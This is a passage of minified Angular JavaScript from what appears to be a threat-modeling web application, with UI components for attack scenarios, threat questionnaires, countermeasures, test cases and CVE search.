this.GetTestCases().filter(e=>e.Name.toLowerCase().includes(this.searchTCString.toLowerCase()))}OnLinkTestCase(e){e.AddLinkedAttackScenario(this.attackScenario),this.selectedTestCase=e}OnUnlinkTestCase(e){e.RemoveLinkedAttackScenario(this.attackScenario.ID),this.selectedTestCase==e&&(this.selectedTestCase=null)}GetSystemThreatsWidth(){return this.dataService.Project.Settings.ThreatActorToAttackScenario?"315px":"0px"}OnSearchASBoxClick(){var e,i,n;null===(n=null===(i=null===(e=this.searchASBox)||void 0===e?void 0:e._elementRef)||void 0===i?void 0:i.nativeElement)||void 0===n||n.focus()}OnSearchLinkedASBoxClick(){var e,i,n;null===(n=null===(i=null===(e=this.searchLinkedASBox)||void 0===e?void 0:e._elementRef)||void 0===i?void 0:i.nativeElement)||void 0===n||n.focus()}OnSearchCMBoxClick(){var e,i,n;null===(n=null===(i=null===(e=this.searchCMBox)||void 0===e?void 0:e._elementRef)||void 0===i?void 0:i.nativeElement)||void 0===n||n.focus()}OnSearchTCBoxClick(){var e,i,n;null===(n=null===(i=null===(e=this.searchTCBox)||void 0===e?void 0:e._elementRef)||void 0===i?void 0:i.nativeElement)||void 0===n||n.focus()}}return t.\u0275fac=function(e){return new(e||t)(Ee(Rc,8),Ee(Tt,8),Ee(Oa),Ee(Yi),Ee(Wn))},t.\u0275cmp=Wt({type:t,selectors:[["app-attack-scenario"]],viewQuery:function(e,i){if(1&e&&(Mi(W5e,5),Mi(F5e,5),Mi(V5e,5),Mi(B5e,5),Mi(H5e,5)),2&e){let n;Vt(n=Bt())&&(i.nameBox=n.first),Vt(n=Bt())&&(i.searchASBox=n.first),Vt(n=Bt())&&(i.searchLinkedASBox=n.first),Vt(n=Bt())&&(i.searchCMBox=n.first),Vt(n=Bt())&&(i.searchTCBox=n.first)}},hostBindings:function(e,i){1&e&&he("keydown",function(r){return i.onKeyDown(r)},0,$c)},inputs:{attackScenario:"attackScenario",canEdit:"canEdit"},decls:1,vars:1,consts:[[3,"disable",4,"ngIf"],["appearance","fill",2,"width","calc(100% - 85px)"],["matInput","","matTooltipShowDelay","1000",3,"spellcheck","ngModel","matTooltip","ngModelChange"],["nameBox",""],["matSuffix","","mat-icon-button","","matTooltipShowDelay","1000",3,"matTooltip","click",4,"ngIf"],["appearance","fill",2,"width","70px","float","right"],["matInput","","type","number","min","0","required","","matTooltipShowDelay","1000",3,"ngModel","matTooltip","ngModelChange"],["style","color: red;","class","alert alert-danger",4,"ngIf"],["appearance","fill",1,"property-form-field"],["matTooltipShowDelay","1000",3,"value","matTooltip","valueChange"],[3,"value",4,"ngFor","ngForOf"],["color","warn","style","margin-left: 5px;",3,"matTooltip",4,"ngIf"],["appearance","fill",1,"property-form-field","disable"],["matInput","","matTooltipShowDelay","1000",3,"spellcheck","value","matTooltip"],["appearance","fill",1,"disable",2,"margin-left","10px","width","calc(100% - 600px - 30px)"],["matInput","",3,"spellcheck","value"],["appearance","fill",1,"property-form-field","disable",2,"margin-left","10px"],["no-space","","matTooltipShowDelay","1000",3,"value","matTooltip","valueChange"],["matInput","",1,"searchBox",3,"placeholder","keyup"],[3,"label",4,"ngFor","ngForOf"],["mat-icon-button","","matSuffix","","matTooltipShowDelay","1000",2,"width","25px",3,"matTooltip","click"],["appearance","fill",2,"margin-left","10px","width","calc(100% - 300px - 15px)"],["no-space","","multiple","",3,"value","valueChange","selectionChange"],["appearance","fill"],["no-space","","multiple","",3,"value","valueChange"],["appearance","fill","style","margin-left: 10px; width: 300px;",4,"ngIf"],["appearance","fill",2,"width","100%"],["matInput","","cdkTextareaAutosize","","cdkAutosizeMinRows","2","cdkAutosizeMaxRows","5",3,"spellcheck","ngModel","ngModelChange"],[3,"tagableElement"],["mat-icon-button","","matTooltipShowDelay","1000",3,"matMenuTriggerFor","matTooltip"],["raMenu","matMenu"],["mat-menu-item","",3,"disabled","click"],["mat-menu-item","",3,"matMenuTriggerFor"],["viewList","matMenu"],["mat-menu-item","",3,"ngModel","matMenuTriggerFor","placeholder","ngModelChange","click"],["searchASBox",""],["mat-menu-item","",3,"matMenuTriggerFor","matMenuTriggerData",4,"ngFor","ngForOf"],["scenarioList","matMenu"],["matMenuContent",""],["filteredScenarioList","matMenu"],["mat-menu-item","","matTooltipShowDelay","1000",3,"matTooltip","click",4,"ngFor","ngForOf"],["appearance","fill","style","width: 200px; margin-left: 10px;",4,"ngIf"],["appearance","fill",2,"width","190px","margin-left","30px"],[3,"value","valueChange","selectionChange"],["matSuffix","","mat-icon-button","",3,"click",4,"ngIf"],["appearance","fill",2,"width","190px","margin-left","10px"],[3,"value","valueChange"],["appearance","fill","style","width: 100%;",4,"ngIf"],[1,"row",2,"margin-bottom","10px"],[1,"column1"],[1,"prop-list","reorder-list"],["mat-subheader",""],["mat-icon-button","","matTooltipShowDelay","1000",2,"margin-left","15px",3,"matMenuTriggerFor","matTooltip"],["addMenu","matMenu"],["mat-menu-item","",3,"click"],["existingMenu","matMenu"],["searchCMBox",""],["countermeasureList","matMenu"],["filteredCountermeasureList","matMenu"],["matTooltipShowDelay","1000",3,"highlight-light","highlight-dark","matTooltip","click",4,"ngFor","ngForOf"],[1,"column2"],["style","margin: 10px 0 10px 10px;",4,"ngIf"],[1,"expansion-panel-headers-align",2,"pointer-events","initial"],[4,"ngIf"],["addLinkedMenu","matMenu"],["searchLinkedASBox",""],["linkedScenarioList","matMenu"],["filteredLinkedScenarioList","matMenu"],["class","row","style","margin-bottom: 10px;",4,"ngIf"],["matSuffix","","mat-icon-button","","matTooltipShowDelay","1000",3,"matTooltip","click"],[1,"alert","alert-danger",2,"color","red"],[3,"value"],["color","warn",2,"margin-left","5px",3,"matTooltip"],[3,"label"],["matTooltipShowDelay","1000",3,"value","matTooltip",4,"ngFor","ngForOf"],["matTooltipShowDelay","1000",3,"value","matTooltip"],["appearance","fill",2,"margin-left","10px","width","300px"],["srcSearch",""],["class","mat-option","color","primary",3,"checked","indeterminate","change",4,"ngIf"],["color","primary",1,"mat-option",3,"checked","indeterminate","change"],["mat-menu-item","",3,"matMenuTriggerFor","matMenuTriggerData"],["mat-menu-item","","matTooltipShowDelay","1000",3,"matTooltip","click"],["appearance","fill",2,"width","200px","margin-left","10px"],["matInput","","type","number",3,"ngModel","ngModelChange"],["matSuffix","","mat-icon-button","","aria-label","Edit",3,"click"],["matSuffix","","mat-icon-button","","aria-label","Delete",3,"click"],["matSuffix","","mat-icon-button","",3,"click"],["matTooltipShowDelay","1000",3,"matTooltip","click"],["mat-list-icon",""],["mat-line","",2,"pointer-events","initial"],["mat-icon-button","","matTooltipShowDelay","1000",2,"margin-left","auto","margin-right","0px",3,"matTooltip","click"],["mat-icon-button","","matTooltipShowDelay","1000",2,"margin-left","auto",3,"matTooltip","click"],[2,"margin","10px 0 10px 10px"],[3,"countermeasure"],["matExpansionPanelContent",""],[3,"entry"],[3,"canEdit","attackVector"],[3,"canEdit","threatQuestion"],[3,"canEdit","threatRule"],[3,"canEdit","attackScenario"],["addLinkedTCMenu","matMenu"],["searchTCBox",""],["filteredTCList","matMenu"],[3,"testCase"]],template:function(e,i){1&e&&ne(0,Q7e,405,211,"div",0),2&e&&F("ngIf",i.attackScenario)},styles:['.column1[_ngcontent-%COMP%]{float:left;width:350px}.column2[_ngcontent-%COMP%]{float:left;width:calc(100% - 350px)}.row[_ngcontent-%COMP%]:after{content:"";display:table;clear:both}.prop-list[_ngcontent-%COMP%] .mat-list-item[_ngcontent-%COMP%]{height:48px;cursor:pointer}.prop-list[_ngcontent-%COMP%] .mat-list-item-content{padding:0 8px!important}.prop-list[_ngcontent-%COMP%] .mat-list-text{padding-left:8px!important}.prop-list[_ngcontent-%COMP%] .mat-subheader[_ngcontent-%COMP%]{display:contents}.prop-list-light[_ngcontent-%COMP%]{border-right:1px solid rgba(0,0,0,.1)}.prop-list-dark[_ngcontent-%COMP%]{border-right:1px solid rgba(255,255,255,.1)}.highlight-light[_ngcontent-%COMP%]{background-color:#0000001a}.highlight-dark[_ngcontent-%COMP%]{background-color:#ffffff1a}.property-form-field[_ngcontent-%COMP%]{width:300px}.reorder-list[_ngcontent-%COMP%]{max-width:100%;display:block;border-radius:4px;overflow:hidden}.reorder-box[_ngcontent-%COMP%]{padding:5px 10px;color:#000000de;display:flex;flex-direction:row;align-items:center;box-sizing:border-box;cursor:move;font-size:14px}.cdk-drag-preview[_ngcontent-%COMP%]{box-sizing:border-box;border-radius:4px;box-shadow:0 5px 5px -3px #0003,0 8px 10px 1px #00000024,0 3px 14px 2px #0000001f}.cdk-drag-placeholder[_ngcontent-%COMP%]{opacity:0}.cdk-drag-animating[_ngcontent-%COMP%]{transition:transform .25s cubic-bezier(0,0,.2,1)}.reorder-box[_ngcontent-%COMP%]:last-child{border:none}.reorder-list.cdk-drop-list-dragging[_ngcontent-%COMP%] .reorder-box[_ngcontent-%COMP%]:not(.cdk-drag-placeholder){transition:transform .25s cubic-bezier(0,0,.2,1)}.disable[_ngcontent-%COMP%]{pointer-events:none}.searchBox[_ngcontent-%COMP%]{padding:0 16px;width:calc(100% - 32px);height:35px!important;line-height:35px!important;font-size:14px;font-weight:400}']}),t})();function $7e(t,a){if(1&t&&(m(0,"span",7),s(1),u()),2&t){const e=V().$implicit;F("matBadge",V().GetUnsetThreats(e))("matBadgeHidden",e.UserCheckedElement),g(1),ke(e.Name)}}function K7e(t,a){1&t&&(m(0,"mat-icon",14),s(1,"info"),u()),2&t&&F("matTooltip",V().$implicit.Description)}function X7e(t,a){if(1&t){const e=Ye();m(0,"button",13),he("click",function(){be(e);const n=V().$implicit;return Me(V(3).OpenAttackVectors(n))}),oe(1,"translate"),s(2,"\n "),m(3,"mat-icon"),s(4,"pageview"),u(),s(5,"\n "),u()}2&t&&at("matTooltip",re(1,1,"pages.modeling.stack.questiondialog.moreDetails"))}function Y7e(t,a){if(1&t&&(m(0,"mat-button-toggle",18),s(1),oe(2,"translate"),u()),2&t){const e=a.$implicit,i=V(2).$implicit;F("value",V(3).GetOptionValue(i.OptionType,e)),g(1),ke(re(2,2,e))}}function J7e(t,a){if(1&t){const e=Ye();m(0,"td"),s(1,"\n "),m(2,"mat-button-toggle-group",15,16),he("change",function(n){be(e);const r=V().$implicit;return Me(V(3).OnQuestionAnswered(n,r))}),s(4,"\n "),ne(5,Y7e,3,4,"mat-button-toggle",17),s(6,"\n "),u(),s(7,"\n "),u()}if(2&t){const e=V().$implicit,i=V(3);g(2),F("value",i.selectedComponent.ThreatQuestions[e.ID]),g(3),F("ngForOf",i.GetOptionKeys(e.OptionType))}}function Z7e(t,a){if(1&t){const e=Ye();m(0,"tr"),s(1,"\n "),m(2,"td"),s(3),ne(4,K7e,2,1,"mat-icon",11),s(5,"\n "),ne(6,X7e,6,3,"button",12),s(7,"\n "),u(),s(8,"\n "),ne(9,J7e,8,2,"td",4),s(10,"\n "),m(11,"td"),s(12,"\n "),m(13,"button",13),he("click",function(){const r=be(e).$implicit;return Me(V(3).OpenNotes(r))}),oe(14,"translate"),s(15,"\n "),m(16,"mat-icon",7),s(17,"edit_note"),u(),s(18,"\n "),u(),s(19,"\n "),u(),s(20,"\n "),u()}if(2&t){const e=a.$implicit,i=V(3);let n;g(3),ct("\n ",e.Question," \n "),g(1),F("ngIf",(null==e.Description?null:e.Description.length)>0),g(2),F("ngIf",(null==(n=i.GetAssociatedAttackVectors(e))?null:n.length)>0),g(3),F("ngIf",1==e.OptionType),g(4),at("matTooltip",re(14,7,"general.Notes")),g(3),F("matBadge",i.GetNotesCountOfQuestion(e))("matBadgeHidden",i.GetNotesCountOfQuestion(e)<1)}}function eRe(t,a){if(1&t){const e=Ye();m(0,"tr"),s(1,"\n "),m(2,"td"),s(3),oe(4,"translate"),m(5,"button",19),he("click",function(){return be(e),Me(V(3).NavigateToSettings())}),oe(6,"translate"),s(7,"\n "),m(8,"mat-icon"),s(9,"open_in_new"),u(),s(10,"\n "),u(),s(11,"\n "),u(),s(12,"\n "),u()}2&t&&(g(3),ct("\n ",re(4,2,"pages.modeling.stack.questiondialog.noConfiguredQuestions"),"\n "),g(2),at("matTooltip",re(6,4,"general.openInNew")))}function tRe(t,a){if(1&t){const e=Ye();s(0,"\n "),m(1,"mat-form-field",8),s(2,"\n "),m(3,"mat-label"),s(4),oe(5,"translate"),u(),s(6,"\n "),m(7,"textarea",9),he("ngModelChange",function(n){return be(e),Me(V().$implicit.Description=n)}),u(),s(8,"\n "),u(),s(9,"\n "),m(10,"h3"),s(11),oe(12,"translate"),u(),s(13,"\n "),it(14,"app-notes",10),s(15,"\n "),m(16,"table"),s(17,"\n "),ne(18,Z7e,21,9,"tr",2),s(19,"\n "),ne(20,eRe,13,6,"tr",4),s(21,"\n "),u(),s(22,"\n ")}if(2&t){const e=V().$implicit,i=V();let n;g(4),ke(re(5,10,"properties.Description")),g(3),F("ngModel",e.Description),g(4),ke(re(12,12,"general.Notes")),g(3),F("showTimestamp",!0)("hasCheckbox",!1)("canToggleTimestamp",!0)("canToggleCheckbox",!0)("notes",i.selectedComponent.Notes),g(4),F("ngForOf",i.GetThreatQuestions(i.selectedComponent)),g(2),F("ngIf",0==(null==(n=i.GetThreatQuestions(i.selectedComponent))?null:n.length))}}function iRe(t,a){1&t&&(m(0,"mat-tab"),s(1,"\n "),ne(2,$7e,2,3,"ng-template",5),s(3,"\n "),ne(4,tRe,23,14,"ng-template",6),s(5,"\n "),u())}function aRe(t,a){if(1&t){const e=Ye();bt(0),s(1,"\n "),m(2,"button",20),s(3),oe(4,"translate"),u(),s(5,"\n "),m(6,"button",21),he("click",function(){return be(e),Me(V().Prev())}),s(7),oe(8,"translate"),u(),s(9,"\n "),m(10,"button",21),he("click",function(){return be(e),Me(V().Next())}),s(11),oe(12,"translate"),u(),s(13,"\n "),Mt()}if(2&t){const e=V();g(2),F("mat-dialog-close",!0),g(1),ke(re(4,6,"general.Close")),g(3),F("disabled",!e.canPrev),g(1),ke(re(8,8,"tour.prev")),g(3),F("disabled",!e.canNext),g(1),ke(re(12,10,"tour.next"))}}let SG=(()=>{class t{constructor(e,i,n,r,c){this.dialogRef=e,this.data=i,this.dataService=n,this.dialog=r,this.router=c,this.selectedTabIndex=0}get components(){return this.data.components}get selectedComponent(){return this.data.selectedComponent}set selectedComponent(e){this.data.selectedComponent=e,this.selectedTabIndex=this.components.indexOf(this.selectedComponent)}get canNext(){return!(this.components.length<=1)&&this.selectedComponent!=this.components[this.components.length-1]}get canPrev(){return!(this.components.length<=1)&&this.selectedComponent!=this.components[0]}ngOnInit(){this.selectedComponent=this.selectedComponent,setTimeout(()=>{this.components.filter(e=>!e.UserCheckedElement).forEach(e=>{0==Object.values(e.ThreatQuestions).filter(i=>null==i).length&&(e.UserCheckedElement=!0)})},10)}OnQuestionAnswered(e,i){var n;this.selectedComponent.ThreatQuestions[i.ID]=e.value;let r=Pl.GetOptions(i.OptionType).find(d=>d.Value==e.value);this.selectedComponent.SetProperty(null===(n=i.Property)||void 0===n?void 0:n.ID,i.ChangesPerOption[r.Key].Value)}OpenAttackVectors(e){this.GetAssociatedAttackVectors(e).forEach(n=>{this.dialog.OpenViewAttackVectorDialog(n,!1)})}OpenNotes(e){null==this.selectedComponent.NotesPerQuestion[e.ID]&&(this.selectedComponent.NotesPerQuestion[e.ID]=[]),this.dialog.OpenNotesDialog(this.selectedComponent.NotesPerQuestion[e.ID],!0,!1,!0,!0)}GetUnsetThreats(e){let i=Object.values(e.ThreatQuestions).filter(n=>null===n).length;return 0!=i||e.UserCheckedElement?i.toString():(setTimeout(()=>{e.UserCheckedElement=!0},100),"")}GetNotesCountOfQuestion(e){return this.selectedComponent.NotesPerQuestion[e.ID]?this.selectedComponent.NotesPerQuestion[e.ID].length:0}GetAssociatedAttackVectors(e){let i=[];if(null!=e.Property){let n=this.dataService.Config.GetThreatRules().filter(r=>r.RuleType==on.Component&&r.ComponentRestriction.componentTypeID==this.selectedComponent.Type.ID);n=n.filter(r=>r.ComponentRestriction.DetailRestrictions.some(c=>c.PropertyRest.ID==e.Property.ID)),i.push(...n.filter(r=>null!=r.AttackVector).map(r=>r.AttackVector))}return i}GetThreatQuestions(e){let i=[];return Object.keys(e.ThreatQuestions).forEach(n=>i.push(this.dataService.Config.GetThreatQuestion(n))),i}GetOptionKeys(e){return Pl.GetOptions(e).map(i=>i.Key)}GetOptionValue(e,i){return Pl.GetOptions(e).find(n=>n.Key==i).Value}GetOptionValues(e){return Pl.GetOptions(e)}Next(){this.selectedComponent=this.components[this.components.indexOf(this.selectedComponent)+1]}Prev(){this.selectedComponent=this.components[this.components.indexOf(this.selectedComponent)-1]}NavigateToSettings(){this.router.navigate(["configuration"],{queryParams:{index:this.selectedComponent.Type.ComponentTypeID}})}}return t.\u0275fac=function(e){return new(e||t)(Ee(Gh),Ee(_p),Ee(Yi),Ee(Wn),Ee(Oo))},t.\u0275cmp=Wt({type:t,selectors:[["app-question-dialog"]],decls:15,vars:4,consts:[["mat-dialog-title",""],[2,"max-width","800px",3,"selectedIndex","selectedIndexChange"],[4,"ngFor","ngForOf"],["align","end"],[4,"ngIf"],["mat-tab-label",""],["matTabContent",""],["matBadgeColor","warn","matBadgePosition","below",3,"matBadge","matBadgeHidden"],["appearance","fill",2,"width","100%","margin","5px 0px"],["matInput","","cdkTextareaAutosize","","cdkAutosizeMinRows","2","cdkAutosizeMaxRows","5","type","text",3,"ngModel","ngModelChange"],[3,"showTimestamp","hasCheckbox","canToggleTimestamp","canToggleCheckbox","notes"],["style","vertical-align: middle;",3,"matTooltip",4,"ngIf"],["mat-icon-button","",3,"matTooltip","click",4,"ngIf"],["mat-icon-button","",3,"matTooltip","click"],[2,"vertical-align","middle",3,"matTooltip"],[3,"value","change"],["group",""],[3,"value",4,"ngFor","ngForOf"],[3,"value"],["mat-button","","matTooltipShowDelay","1000",1,"toolBtn",3,"matTooltip","click"],["mat-button","",3,"mat-dialog-close"],["mat-button","",3,"disabled","click"]],template:function(e,i){1&e&&(m(0,"h2",0),s(1),u(),s(2,"\n"),m(3,"mat-dialog-content"),s(4,"\n "),m(5,"mat-tab-group",1),he("selectedIndexChange",function(r){return i.selectedComponent=i.components[r]}),s(6,"\n "),ne(7,iRe,6,0,"mat-tab",2),s(8,"\n "),u(),s(9,"\n"),u(),s(10,"\n"),m(11,"mat-dialog-actions",3),s(12,"\n "),ne(13,aRe,14,12,"ng-container",4),s(14,"\n"),u()),2&e&&(g(1),ke(i.selectedComponent.Name),g(4),F("selectedIndex",i.selectedTabIndex),g(2),F("ngForOf",i.components),g(6),F("ngIf",!0))},styles:[".toolBtn[_ngcontent-%COMP%]{width:30px;min-width:30px;padding:0;line-height:25px;margin-left:5px}"]}),t})();function nRe(t,a){if(1&t){const e=Ye();fi(),ln(),m(0,"button",2),he("click",function(){be(e);const n=V();return Me(n.AddTestCase(n.selectedComponent))}),oe(1,"translate"),s(2,"\n "),m(3,"mat-icon"),s(4,"checklist"),u(),s(5,"\n "),u()}if(2&t){const e=V();at("matTooltip",re(1,2,"pages.modeling.diagram.addTestCase")),F("disabled",!e.selectedComponent)}}function oRe(t,a){if(1&t&&(m(0,"div",25),s(1),u()),2&t){const e=V().$implicit,i=V(2);Ct("component-dark",i.theme.IsDarkMode),g(1),ke(i.GetComponentPort(e))}}function rRe(t,a){if(1&t){const e=Ye();m(0,"div",11),s(1,"\n "),m(2,"button",23),he("click",function(){const r=be(e).$implicit;return Me(V(2).OnComponentClick(r))})("dblclick",function(){const r=be(e).$implicit;return Me(V(2).OnComponentDblClick(r))})("contextmenu",function(n){const c=be(e).$implicit;return Me(V(2).OpenContextMenu(n,c))}),s(3),u(),s(4,"\n "),ne(5,oRe,2,3,"div",24),s(6,"\n "),u()}if(2&t){const e=a.$implicit,i=V(2);let n;g(2),ri("opacity",e.IsActive?1:.5)("border-color",i.GetComponentColor(e))("border-style",e.OutOfScope?"dotted":"solid"),Ct("component-dark",i.theme.IsDarkMode)("component-third-party",e.IsThirdParty),F("matBadge",i.CompBadge(e))("matBadgeHidden",0==i.CompBadge(e).length),g(1),ct("\n ",e.Name,"\n "),g(2),F("ngIf",(null==(n=i.GetComponentPort(e))?null:n.length)>0)}}function sRe(t,a){1&t&&(m(0,"button",26),s(1,"Temp"),u())}function cRe(t,a){if(1&t){const e=Ye();m(0,"tr",19),he("drop",function(n){const c=be(e).$implicit;return Me(V().OnDrop(n,c))}),s(1,"\n "),m(2,"td")(3,"p",20),s(4),u()(),s(5,"\n "),m(6,"td",10),s(7,"\n "),ne(8,rRe,7,14,"div",21),s(9,"\n "),ne(10,sRe,2,0,"button",22),s(11,"\n "),u(),s(12,"\n "),u()}if(2&t){const e=a.$implicit,i=V();g(4),ke(e.Name),g(4),F("ngForOf",i.GetComponents(e)),g(2),F("ngIf",null==i.GetComponents(e)||0==i.GetComponents(e).length)}}function lRe(t,a){if(1&t&&(m(0,"span",31),s(1),u()),2&t){const e=V(2).item;g(1),ke(e.GetProperty("Name"))}}function dRe(t,a){if(1&t){const e=Ye();m(0,"button",29),he("click",function(){be(e);const n=V(2).item;return Me(V().AddTestCase(n))}),s(1,"\n "),m(2,"mat-icon"),s(3,"checklist"),u(),s(4,"\n "),m(5,"span"),s(6),oe(7,"translate"),u(),s(8,"\n "),u()}2&t&&(g(6),ke(re(7,1,"pages.modeling.diagram.addTestCase")))}function mRe(t,a){if(1&t){const e=Ye();bt(0),s(1,"\n "),ne(2,lRe,2,1,"span",28),s(3," \n "),m(4,"button",29),he("click",function(){be(e);const n=V().item;return Me(V().OnComponentDblClick(n))}),s(5,"\n "),m(6,"mat-icon"),s(7,"question_answer"),u(),s(8,"\n "),m(9,"span"),s(10),oe(11,"translate"),u(),s(12,"\n "),u(),s(13,"\n "),m(14,"button",29),he("click",function(){be(e);const n=V().item;return Me(V().OnDeleteElement(n))}),s(15,"\n "),m(16,"mat-icon"),s(17,"delete"),u(),s(18,"\n "),m(19,"span"),s(20),oe(21,"translate"),u(),s(22,"\n "),u(),s(23,"\n "),m(24,"button",29),he("click",function(){be(e);const n=V().item;return Me(V().AddThreat(n))}),s(25,"\n "),m(26,"mat-icon"),s(27,"flash_on"),u(),s(28,"\n "),m(29,"span"),s(30),oe(31,"translate"),u(),s(32,"\n "),u(),s(33,"\n "),ne(34,dRe,9,3,"button",30),s(35,"\n "),m(36,"button",29),he("click",function(){be(e);const n=V().item;return Me(V().AddCountermeasure(n))}),s(37,"\n "),m(38,"mat-icon"),s(39,"security"),u(),s(40,"\n "),m(41,"span"),s(42),oe(43,"translate"),u(),s(44,"\n "),u(),s(45,"\n "),m(46,"button",29),he("click",function(){be(e);const n=V().item;return Me(V().MoveLeft(n))}),s(47,"\n "),m(48,"mat-icon"),s(49,"arrow_back"),u(),s(50,"\n "),m(51,"span"),s(52),oe(53,"translate"),u(),s(54,"\n "),u(),s(55,"\n "),m(56,"button",29),he("click",function(){be(e);const n=V().item;return Me(V().MoveRight(n))}),s(57,"\n "),m(58,"mat-icon"),s(59,"arrow_forward"),u(),s(60,"\n "),m(61,"span"),s(62),oe(63,"translate"),u(),s(64,"\n "),u(),s(65,"\n "),Mt()}if(2&t){const e=V().item,i=V();g(2),F("ngIf",e),g(8),ke(re(11,8,"properties.openQuestionnaire")),g(10),ke(re(21,10,"pages.modeling.stack.deleteComponent")),g(10),ke(re(31,12,"pages.modeling.diagram.addAttackScenario")),g(4),F("ngIf",i.dataService.Project.HasTesting),g(8),ke(re(43,14,"pages.modeling.diagram.addCountermeasure")),g(10),ke(re(53,16,"pages.modeling.stack.moveLeft")),g(10),ke(re(63,18,"pages.modeling.stack.moveRight"))}}function uRe(t,a){if(1&t&&(s(0,"\n "),ne(1,mRe,66,20,"ng-container",27),s(2,"\n ")),2&t){const e=a.item;g(1),F("ngIf",e)}}let gT=(()=>{class t{constructor(e,i,n,r,c){this.theme=e,this.dataService=i,this.dialog=n,this.dialogService=r,this.elRef=c,this.menuTopLeftPosition={x:"0",y:"0"},this.selectionChanged=new Tt}get components(){var e;return null===(e=this.stack)||void 0===e?void 0:e.GetChildren()}ngOnInit(){}CompBadge(e){return e.IsActive&&!e.UserCheckedElement?"!":""}GetGroups(){return this.dataService.Config.GetMyComponentTypeGroups(this.stack.ComponentTypeID)}GetComponents(e){return this.components.filter(i=>e.Types.includes(i.Type))}OnComponentClick(e){this.selectedComponent=e,this.selectionChanged.emit(e)}OnComponentDblClick(e){e.IsActive=!0,this.selectedComponent=e;let i={components:this.components.filter(r=>r.IsActive),selectedComponent:this.selectedComponent};this.dialog.open(SG,{hasBackdrop:!0,data:i}).afterClosed().subscribe(r=>{this.selectedComponent=i.selectedComponent})}OnDrop(e,i){const n=JSON.parse(e.dataTransfer.getData("dragDropData"));let r;n.componentTypeID&&(r=this.dataService.Config.GetMyComponentType(n.componentTypeID)),r||(r=this.dataService.Config.CreateMyComponentType(i));const c=this.dataService.Project.CreateComponent(r);c.SyncNameToTypeName=!0,c.Name=r.Name,c.IsActive=!0,c.IsThirdParty=!1,this.stack.AddChild(c),this.OnComponentClick(c),setTimeout(()=>{document.dispatchEvent(new KeyboardEvent("keydown",{key:"F2"}))},250)}AllowDrop(e){e.preventDefault()}GetComponentColor(e){return e&&e==this.selectedComponent?this.theme.Primary:this.theme.IsDarkMode?"white":"black"}GetComponentPort(e){if(e.TypeID==zr.Software){const i=e.GetProperties().find(n=>n.Type==Ii.PortBox);if(i)return e.GetProperty(i.ID)}return null}AddThreat(e){if(e||(e=this.selectedComponent),e){let i=this.dataService.Project.CreateAttackScenario(this.stack.ID,!1);i.SetMapping("",[],e,[e],null,null,null,null),i.IsGenerated=!1,this.dialogService.OpenAttackScenarioDialog(i,!0).subscribe(n=>{n||this.dataService.Project.DeleteAttackScenario(i)})}}ShowCVESearch(){this.dialogService.OpenCveSearchDialog(this.selectedComponent,this.stack.ID)}AddTestCase(e){if(e||(e=this.selectedComponent),e){const i=this.dataService.Project.CreateTestCase();i.AddLinkedElement(e),this.dialogService.OpenTestCaseDialog(i,!0).subscribe(n=>{n||this.dataService.Project.DeleteTestCase(i)})}}AddCountermeasure(e){if(e||(e=this.selectedComponent),e){let i=this.dataService.Project.CreateCountermeasure(this.stack.ID,!1);i.SetMapping(null,[e],[]),this.dialogService.OpenCountermeasureDialog(i,!0,this.stack.GetChildrenFlat()).subscribe(n=>{n||this.dataService.Project.DeleteCountermeasure(i)})}}OnDeleteElement(e){this.dialogService.OpenDeleteObjectDialog(e).subscribe(i=>{i&&this.dataService.Project.DeleteComponent(e)})}MoveLeft(e){const i=this.GetGroups().find(T=>this.GetComponents(T).includes(e)),n=this.GetComponents(i),r=this.stack.GetChildren(),c=r.indexOf(e),d=r.indexOf(n[n.indexOf(e)-1]);if(c>0&&d>=0){const T=this.stack.Data.childrenIDs;T.splice(d,0,T.splice(c,1)[0])}}MoveRight(e){const i=this.GetGroups().find(T=>this.GetComponents(T).includes(e)),n=this.GetComponents(i),r=this.stack.GetChildren(),c=r.indexOf(e),d=r.indexOf(n[n.indexOf(e)+1]);if(c=0){const T=this.stack.Data.childrenIDs;T.splice(d,0,T.splice(c,1)[0])}}OpenContextMenu(e,i){e.preventDefault(),this.menuTopLeftPosition.x=e.clientX+"px",this.menuTopLeftPosition.y=e.clientY+"px",this.matMenuTrigger.menuData={item:i},this.matMenuTrigger.openMenu()}}return t.\u0275fac=function(e){return new(e||t)(Ee(Oa),Ee(Yi),Ee(vu),Ee(Wn),Ee(mi))},t.\u0275cmp=Wt({type:t,selectors:[["app-stack"]],viewQuery:function(e,i){if(1&e&&Mi(po,5),2&e){let n;Vt(n=Bt())&&(i.matMenuTrigger=n.first)}},inputs:{stack:"stack",selectedComponent:"selectedComponent"},outputs:{selectionChanged:"selectionChanged"},decls:89,vars:56,consts:[[2,"width","100%","height","100%"],[1,"tools","mat-elevation-z8"],["mat-button","","matTooltipShowDelay","1000",1,"toolBtn",3,"disabled","matTooltip","click"],["xmlns","http://www.w3.org/2000/svg","width","25","height","25","version","1.1"],["x","1","y","1","width","23","height","23","rx","3","ry","3"],["x","2","y","16",1,"heavy"],["mat-button","","class","toolBtn","matTooltipShowDelay","1000",3,"disabled","matTooltip","click",4,"ngIf"],[2,"border-spacing","0 20px",3,"dragover"],[3,"drop",4,"ngFor","ngForOf"],[1,"group",2,"font-size","x-small"],[2,"display","flex","flex-wrap","wrap"],[2,"position","relative"],[1,"component","component-legend"],[1,"component","component-legend",2,"opacity","0.5"],[1,"component","component-legend","component-third-party"],[1,"component","component-legend",2,"border-style","dotted"],[2,"visibility","hidden","position","fixed",3,"matMenuTriggerFor"],["rightMenu","matMenu"],["matMenuContent",""],[3,"drop"],[1,"group"],["style","position: relative;",4,"ngFor","ngForOf"],["style","visibility: hidden;","class","component",4,"ngIf"],["matBadgeColor","primary","matBadgePosition","below",1,"component",3,"matBadge","matBadgeHidden","click","dblclick","contextmenu"],["class","component-base component-port",3,"component-dark",4,"ngIf"],[1,"component-base","component-port"],[1,"component",2,"visibility","hidden"],[4,"ngIf"],["style","margin-left: 20px; margin-right: 20px;",4,"ngIf"],["mat-menu-item","",3,"click"],["mat-menu-item","",3,"click",4,"ngIf"],[2,"margin-left","20px","margin-right","20px"]],template:function(e,i){if(1&e&&(m(0,"div",0),s(1,"\n "),m(2,"div",1),s(3,"\n "),m(4,"button",2),he("click",function(){return i.AddThreat(i.selectedComponent)}),oe(5,"translate"),s(6,"\n "),m(7,"mat-icon"),s(8,"flash_on"),u(),s(9,"\n "),u(),s(10,"\n "),m(11,"button",2),he("click",function(){return i.ShowCVESearch()}),oe(12,"translate"),s(13,"\n "),s(14,"\n "),fi(),m(15,"svg",3),s(16,"\n "),it(17,"rect",4),s(18,"\n "),m(19,"text",5),s(20,"CVE"),u(),s(21,"\n 